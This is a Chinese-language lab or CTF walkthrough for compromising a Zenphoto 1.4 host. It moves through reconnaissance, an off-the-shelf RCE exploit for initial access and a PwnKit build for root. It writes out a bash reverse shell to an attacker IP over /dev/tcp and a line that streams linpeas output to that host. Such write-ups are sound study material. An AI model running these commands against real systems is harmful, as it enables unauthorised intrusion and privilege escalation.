Recon

先來看看這臺主機開了什麼樣的服務
PS. 這邊所使用的列舉程式來自 https://github.com/21y4d/nmapAutomator ，這個腳本可以幫我們自動用不同的工具做資訊蒐集與掃描

sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.143.41 -type script;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.143.41 -type full;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.143.41 -type udp;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.143.41 -type recon;

FFUF 的結果裡面有一個 test頁面

http://zenphoto/test/ 看起來是一個簡單的網站，接著看一下source code裡面有什麼

view-source:http://zenphoto/test/ source code裡面有看到 zenphoto 的版本

查一下export DB以後發現有一個 RCE 的 exploit code
下載下來

searchsploit zenphoto 1.4 

searchsploit -m 18083 

http://zenphoto/test/robots.txt

我們沒有權限去讀 http://zenphoto/test/zp-data/ 下面的任何檔案

http://zenphoto/test/zp-core/admin.php

Initial Access

這個 code 是用 PHP 寫的 那這邊我們要先注意 zenphoto 的路徑是在 test 下面
執行過後我們順利拿到了一個shell

php 18083.php $tIP /test/ 

但這個 shell 看起來不太習慣 也不確定穩不穩定，所以我決定去建一個 reverse shell 連回 kali

/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.169/80 0>&1'

順利進來這臺主機以後先把環境變數設定好 然後就可以直接去拿我們的第一個 flag

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux; alias ll='clear;ls -alhst --color=auto'

Privilege Escalation

Linpeas 的結果裡面有一個有趣的CVE 是大名鼎鼎的 Pwnkit
我這邊用的是這支 https://github.com/ly4k/PwnKit

./linpeas_20231025.sh > /dev/tcp/192.168.45.169/80 0>&1
rlwrap nc -vnlp 80 > linpeas_result

如果上傳這個 github下面 pre-build好的 binary file 會報錯

因為這臺機器的環境跟預先 compile 出來的執行檔不同 所以我們變成要上傳一個 C code 然後直接在靶機上做 compile

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

雖然這邊顯示syntax error 但事實上這個 exploit code 已經順利執行成功所以我們也拿到了 root 的身分
第2個 flag get